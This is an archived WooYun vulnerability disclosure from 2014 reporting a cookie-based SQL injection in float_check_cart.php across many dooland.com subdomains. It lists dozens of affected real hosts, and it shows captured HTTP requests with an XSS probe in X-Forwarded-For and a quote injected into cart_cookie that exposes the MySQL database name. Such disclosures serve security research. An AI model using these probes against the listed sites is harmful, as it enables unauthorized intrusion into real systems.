乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-12-09: 细节已通知厂商并且等待厂商处理中 2014-12-14: 厂商已经主动忽略漏洞,细节向公众公开
学好SQL注入,走遍天下都不怕读览天下的子站太多,但是都存在同样的问题。
注入页面:
形如 xx.dooland.com/float_check_cart.php
几乎涉及到读览天下所有子站(实在太多,没有全部测试)
autofan.dooland.com/float_check_cart.phpbhstory.dooland.com/float_check_cart.phpbjsqb.dooland.com/float_check_cart.phpbjsqb.dooland.com/float_check_cart.phpbjsqb.dooland.com/float_check_cart.phpbjsqb.dooland.com/float_check_cart.phpbjsqb.dooland.com/float_check_cart.phpbjsqb.dooland.com/float_check_cart.phpbjzb.dooland.com/float_check_cart.phpbkzs.dooland.com/float_check_cart.phpblogweekly.dooland.com/float_check_cart.phpbqzs.dooland.com/float_check_cart.phpbxzj.dooland.com/float_check_cart.phpcaifutang.dooland.com/float_check_cart.phpcaijing.dooland.com/float_check_cart.phpcaijingtianxia.dooland.com/float_check_cart.phpcaikuaixinbao.dooland.com/float_check_cart.phpcbrand.dooland.com/float_check_cart.phpcbzz.dooland.com/float_check_cart.phpccmm.dooland.com/float_check_cart.phpceocio.dooland.com/float_check_cart.phpceoun.dooland.com/float_check_cart.phpcgoldjewelry.dooland.com/float_check_cart.phpchaonanzhi.dooland.com/float_check_cart.phpcharm.dooland.com/float_check_cart.phpchewang.dooland.com/float_check_cart.phpchinaapparel.dooland.com/float_check_cart.phpchinatoday.dooland.com/float_check_cart.phpchinattw.dooland.com/float_check_cart.phpchinaxiaokang.dooland.com/float_check_cart.phpchip.dooland.com/float_check_cart.phpciweekly.dooland.com/float_check_cart.phpcnemag.dooland.com/float_check_cart.phpcniti.dooland.com/float_check_cart.phpCOCO.dooland.com/float_check_cart.phpcomicfans.dooland.com/float_check_cart.phpcomicshow.dooland.com/float_check_cart.phpcomicworld.dooland.com/float_check_cart.phpcorp.dooland.com/float_check_cart.phpcpcfan.dooland.com/float_check_cart.phpcpcw.dooland.com/float_check_cart.phpcwsj.dooland.com/float_check_cart.phpcyb.dooland.com/float_check_cart.phpcyj.dooland.com/float_check_cart.phpdaxuesheng.dooland.com/float_check_cart.phpdazhongDV.dooland.com/float_check_cart.phpdazhongsheying.dooland.com/float_check_cart.phpddsj.dooland.com/float_check_cart.phpdjnsc.dooland.com/float_check_cart.phpdjnzj.dooland.com/float_check_cart.phpdmcy.dooland.com/float_check_cart.phpdnahz.dooland.com/float_check_cart.phpdutianxia.dooland.com/float_check_cart.phpdzlcgw.dooland.com/float_check_cart.phpdzqc.dooland.com/float_check_cart.phpdztzzn.dooland.com/float_check_cart.phpdzyc.dooland.com/float_check_cart.phpebusinessreview.dooland.com/float_check_cart.phpenterainment.dooland.com/float_check_cart.phpfc.dooland.com/float_check_cart.phpffs.dooland.com/float_check_cart.phpfh.dooland.com/float_check_cart.phpfoto-video.dooland.com/float_check_cart.phpfsz.dooland.com/float_check_cart.phpfxjj.dooland.com/float_check_cart.phpFZDMAG.dooland.com/float_check_cart.phpfzfzzk.dooland.com/float_check_cart.phpganla.dooland.com/float_check_cart.phpgaoerfudujia.dooland.com/float_check_cart.phpgjxqdb.dooland.com/float_check_cart.phpgjzb.dooland.com/float_check_cart.phpglmjpl.dooland.com/float_check_cart.phpglobalpeople.dooland.com/float_check_cart.phpglxjsjb.dooland.com/float_check_cart.php......
随便测试一个:艺术财经注入页面:artvalue.dooland.com/float_check_cart.php(所有涉及到SQL注入的页面都是这样的)
刷新页面,使用web代理burpsuit,抓包:
GET /float_check_cart.php HTTP/1.1Host: artvalue.dooland.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: PHPSESSID=0cgkar0vhtd5f7r9e4fsn8f0l0; PHPSESSID=5t0a8hbnjeinf681rd6fuo1287; CNZZDATA672294=cnzz_eid%3D1709598733-1418108954-%26ntime%3D1418108954X-Forwarded-For: <script>alert("XSS")</script>Connection: keep-aliveCache-Control: max-age=0
修改POST包为:
GET /float_check_cart.php HTTP/1.1Cookie: PHPSESSID=ukraksutb9kt5miu039sjfv0g4; cart_cookie=1'"; PHPSESSID=trqemklslkchg4vvdjep2agcm0Referer: http://artvalue.dooland.com:80/Host: artvalue.dooland.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*
爆出数据库类型为Mysql,数据库名为mag_list:
参数过滤
危害等级:无影响厂商忽略
忽略时间:2014-12-14 17:52
暂无